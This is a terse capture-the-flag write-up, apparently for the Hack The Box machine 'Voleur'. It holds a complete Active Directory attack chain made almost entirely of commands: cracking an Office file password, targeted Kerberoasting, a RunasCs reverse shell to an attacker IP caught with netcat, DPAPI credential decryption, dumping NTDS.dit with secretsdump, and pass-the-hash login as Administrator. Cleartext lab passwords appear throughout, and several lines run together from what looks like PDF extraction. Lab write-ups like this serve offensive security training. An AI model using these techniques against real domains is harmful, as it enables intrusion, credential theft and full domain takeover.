Downloaded `Access_Review.xlsx` from `IT/First-Line Support`:
dc.voleur.htb, VOLEUR.HTBryan.naylor / HollowOct31Nyt[realms]
VOLEUR.HTB = {
kdc = 10.129.71.253
admin_server = 10.129.71.253
default_domain = voleur.htb
}
Generated TGT and listed shares:
netexec smb DC.VOLEUR.HTB -u ryan.naylor -p 'HollowOct31Nyt' -k --generate-tgt ryan.naylor
export KRB5CCNAME=ryan.naylor.ccache
klist
netexec smb DC.VOLEUR.HTB -u ryan.naylor -p 'HollowOct31Nyt' -k --shares
Downloaded Access_Review.xlsx from IT/First-Line Support:
KRB5CCNAME=ryan.naylor.ccache smbclient.py -k DC.VOLEUR.HTB
use IT
cd First-Line Support
get Access_Review.xlsx
Cracked document password:
office2john Access_Review.xlsx >> hash.txt
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Password: football1
Decrypted with msoffcrypto:
python3 -m venv venv
source venv/bin/activate
pip install msoffcrypto-tool
python3 -m msoffcrypto -p football1 Access_Review.xlsx entschluesselt_Access_Review.xlsx
Recovered service credentials:
svc_ldap / M1XyC9pW7qT5Vnsvc_iis / N5pXyV1WqM7CZ8Hint for deleted user:
todd.wolfe / NightT1meP1dg3on14bloodhound-python -u ryan.naylor -p 'HollowOct31Nyt' -c All -d VOLEUR.HTB -ns 10.129.71.253 --zip -k
Findings:
svc_ldap has GenericWrite on lacey.miller and WriteSPN on svc_winrm.Targeted Kerberoast:
netexec smb DC.VOLEUR.HTB -u svc_ldap -p 'M1XyC9pW7qT5Vn' -k --generate-tgt svc_ldap
export KRB5CCNAME=svc_ldap.ccache
targetedKerberoast.py -k --dc-host dc.voleur.htb -u svc_ldap -d voleur.htb
john --wordlist=/usr/share/wordlists/rockyou.txt hashes_kerberos.txt
Cracked svc_winrm:
svc_winrm / AFireInsidedeOzarctica980219afiWinRM and user flag:
netexec smb DC.VOLEUR.HTB -u svc_winrm -p 'AFireInsidedeOzarctica980219afi' -k --generate-tgt svc_winrm
export KRB5CCNAME=svc_winrm.ccache
evil-winrm -i dc.voleur.htb -k -u svc_winrm -r VOLEUR.HTB
type C:\Users\svc_winrm\Desktop\user.txt
Used RunasCs to obtain a shell as svc_ldap:
mkdir C:\tools
cd C:\tools
upload RunasCs.exe
nc -lvnp 4444
.\RunasCs.exe svc_ldap M1XyC9pW7qT5Vn cmd.exe -r 10.10.16.xx:4444
Restored deleted user object:
Get-ADObject -Filter 'isDeleted -eq $true -and objectClass -eq "user"' -IncludeDeletedObjects -Properties objectSid, lastKnownParent, ObjectGUID | Select-Object Name, ObjectGUID, objectSid, lastKnownParent | Format-List
Restore-ADObject -Identity '1c6b1deb-c372-4cbb-87b1-15031de169db'
net user /domain
Kerberos access as Todd:
netexec smb DC.VOLEUR.HTB -u todd.wolfe -p 'NightT1meP1dg3on14' -k --generate-tgt todd.wolfe
export KRB5CCNAME=todd.wolfe.ccache
KRB5CCNAME=todd.wolfe.ccache smbclient.py -k DC.VOLEUR.HTB
Downloaded DPAPI files:
mget /Second-Line Support/Archived Users/todd.wolfe/AppData/Roaming/Microsoft/Credentials/772275FAD58525253490A9B0039791D3
mget /Second-Line Support/Archived Users/todd.wolfe/AppData/Roaming/Microsoft/Protect/S-1-5-21-3927696377-1337352550-2781715495-1110/08949382-134f-4c63-b93c-ce52efc0aa88
Decrypted masterkey and credentials:
dpapi.py masterkey -file 08949382-134f-4c63-b93c-ce52efc0aa88 -sid S-1-5-21-3927696377-1337352550-2781715495-1110 -password NightT1meP1dg3on14
dpapi.py credential -file 772275FAD58525253490A9B0039791D3 -key 0xd2832547d1d5e0a01ef271ede2d299248d1cb0320061fd5355fea2907f9cf879d10c9f329c77c4fd0b9bf83a9e240ce2b8a9dfb92a0d15969ccae6f550650a83
Recovered:
jeremy.combs / qT3V9pLXyN7W4mKerberos as Jeremy, downloaded key and note from Third-Line Support:
netexec smb DC.VOLEUR.HTB -u jeremy.combs -p 'qT3V9pLXyN7W4m' -k --generate-tgt jeremy.combs
export KRB5CCNAME=jeremy.combs.ccache
KRB5CCNAME=jeremy.combs.ccache smbclient.py -k DC.VOLEUR.HTB
mget /Third-Line Support/id_rsa
mget /Third-Line Support/Note.txt.txt
chmod 600 id_rsa
ssh svc_backup@voleur.htb -p 2222 -i id_rsa
ls '/mnt/c/IT/Third-Line Support/Backups/Active Directory'
ls '/mnt/c/IT/Third-Line Support/Backups/registry'
Copied NTDS and SYSTEM:
scp -P 2222 -i id_rsa svc_backup@voleur.htb:/mnt/c/IT/Third-Line\ Support/Backups/Active\ Directory/* ./
scp -P 2222 -i id_rsa svc_backup@voleur.htb:/mnt/c/IT/Third-Line\ Support/Backups/registry/* ./
Dumped hashes and authenticated as Administrator:
secretsdump.py -system SYSTEM -ntds ntds.dit LOCAL
getTGT.py -hashes :e656e07c56d831611bxxxxxb259ad2 -dc-ip 10.129.71.253 voleur.htb/administrator
export KRB5CCNAME=administrator.ccache
evil-winrm -i dc.voleur.htb -k -u administrator -r VOLEUR.HTB
Root flag:
type C:\Users\Administrator\Desktop\root.txt
User Flag: C:\Users\svc_winrm\Desktop\user.txt (value not recorded in PDF)
Root Flag: C:\Users\Administrator\Desktop\root.txt (value not recorded in PDF)
Secure Service Account Credentials
Protect AD Backups
Reduce Kerberoast Exposure
WriteSPN allowed targeted Kerberoast.Limit DPAPI Credential Access
Restrict AD Object Restore Rights